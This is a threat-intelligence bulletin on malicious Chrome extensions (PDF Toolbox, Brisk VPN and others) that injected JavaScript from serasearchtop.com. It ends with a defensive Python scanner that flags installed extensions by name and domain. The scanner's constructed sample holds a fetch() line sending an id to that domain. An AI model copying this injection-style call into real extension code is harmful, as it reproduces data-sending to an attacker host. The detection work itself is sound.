Malicious Chrome Extensions With 75M Installs Removed From Web Store

Cyber Security Threat Summary:
“Google has removed from the Chrome Web Store 32 malicious extensions that could alter search results and push spam or unwanted ads. Collectively, they come with a download count of 75 million. The extensions featured legitimate functionality to keep users unaware of the malicious behavior that came in obfuscated code to deliver the payloads. Cybersecurity researcher Wladimir Palant analyzed the PDF Toolbox extension (2 million downloads) available from Chrome Web Store and found that it included code that was disguised as a legitimate extension API wrapper. In a write-up in mid-May, the researcher explains that the code allowed the “serasearchtop[.]com” domain to inject arbitrary JavaScript code into any website the user visited. The potential for abuse ranges from inserting ads into webpages to stealing sensitive information. However, Palant didn’t observe any malicious activity, so the code’s purpose remained unclear. The researcher also noticed that the code was set to activate 24 hours after installing the extension, a behavior that is typically associated with malicious intentions. A few days ago, Palant published a follow-up post on the case to alert that he had discovered the same suspicious code in another 18 Chrome extensions with a total download count of 55 million” (Bleeping Computer, 2023).

Below is a list of some of the malicious extensions uncovered by Palant:

  • Autoskip for Youtube – 9 million active users
  • Soundboost – 6.9 million active users
  • Crystal Ad block – 6.8 million active users
  • Brisk VPN – 5.6 million active users
  • Clipboard Helper – 3.5 million active users
  • Maxi Refresher – 3.5 million active users

According to Palant, all of these extensions were still available for download in the Chrome Web Store when he published the second post, despite his having reported them to Google.

“Continuing his investigation, Palant found two variants of the code: one masquerading as Mozilla’s WebExtension browser API Polyfill, and another posing as the Day.js library. However, both versions featured the same arbitrary JS code injection mechanism involving serasearchtop[.]com. Although the researcher did not observe any clear malicious activity, he noted that there are numerous user reports and reviews on the Web Store indicating that the extensions were performing redirections and search result hijacking” (Bleeping Computer, 2023).

Security Officer Comments:
Today Avast released a follow-up blog post in response to Palant’s findings, stating that the company had reported the malicious extensions to Google. At the time of writing, Avast noted that 32 of the extensions were still available on the Chrome Web Store, meaning that the additional 50 extensions had already been taken down. Interestingly, Avast says that the “75 million installs” figure highlighted in Palant’s report seems to have been inflated, as the “number of people who encountered the threat isn’t proportional to the number of installs from the Chrome Web Store.”

Suggested Correction(s):
“Responding to a request for comment from BleepingComputer before Avast published its findings, a Google spokesperson said that the ‘reported extensions have been removed from the Chrome Web Store.’ Users should note that the removal of the extensions from the Chrome Web Store does not automatically deactivate or uninstall them from their browsers, so manual action is required to eliminate the risk” (Bleeping Computer, 2023).
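As an added, constructed example of the manual check that last sentence calls for (this is not code from the post, from Palant or from Avast): a Python script that walks a Chrome profile's Extensions directory and flags installed extensions whose manifest name matches one named above or whose JavaScript references serasearchtop[.]com. The profile location is an assumption (Chrome's default on Linux is ~/.config/google-chrome/Default/Extensions), and the sample tree it builds for a stand-alone run is constructed.

```python
import json
import re
import tempfile
from pathlib import Path

# Extension names called out in the post; matched case-insensitively against manifest.json "name".
FLAGGED_NAMES = {"pdf toolbox", "autoskip for youtube", "soundboost", "crystal ad block",
                 "brisk vpn", "clipboard helper", "maxi refresher"}
# The injection endpoint named in the post (defanged there as serasearchtop[.]com).
FLAGGED_DOMAIN = re.compile(rb"serasearchtop\.com", re.IGNORECASE)

def scan_extensions(ext_root):
    """Walk a Chrome profile's Extensions/<id>/<version>/ tree and return
    (extension_id, version, name, reasons) for each extension that is named like
    a flagged one or whose JavaScript references the flagged domain."""
    findings = []
    for manifest in sorted(Path(ext_root).glob("*/*/manifest.json")):
        ext_dir = manifest.parent
        ext_id, version = ext_dir.parent.name, ext_dir.name
        try:
            name = json.loads(manifest.read_text(encoding="utf-8")).get("name", "")
        except (OSError, ValueError):
            name = ""  # unreadable manifest: still scan the JS below
        reasons = []
        # Localized manifests carry a "__MSG_xxx__" placeholder here, so the name match is best effort.
        if name.strip().lower() in FLAGGED_NAMES:
            reasons.append(f"name matches flagged extension {name!r}")
        for js in sorted(ext_dir.rglob("*.js")):
            if FLAGGED_DOMAIN.search(js.read_bytes()):
                reasons.append(f"{js.relative_to(ext_dir)} references serasearchtop.com")
                break
        if reasons:
            findings.append((ext_id, version, name, reasons))
    return findings

def build_sample_tree():
    """Constructed sample profile (assumption, not real data): one clean extension,
    one with a flagged name, one with a clean name whose JS contacts the domain."""
    root = Path(tempfile.mkdtemp())
    samples = {
        "aaaa": ("Notes", "console.log('hi');"),
        "bbbb": ("Brisk VPN", "chrome.runtime.sendMessage({});"),
        "cccc": ("Weather Now", "fetch('https://serasearchtop.com/' + id);"),
    }
    for ext_id, (name, js) in samples.items():
        d = root / ext_id / "1.0.0"
        d.mkdir(parents=True)
        (d / "manifest.json").write_text(json.dumps({"name": name, "manifest_version": 3}))
        (d / "background.js").write_text(js)
    return root
```

A hit should be confirmed in chrome://extensions before removal, and a clean result is not proof of absence, since the post notes the payload code was obfuscated and the domain string may not appear in plain text.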

Link(s):
https://www.bleepingcomputer.com/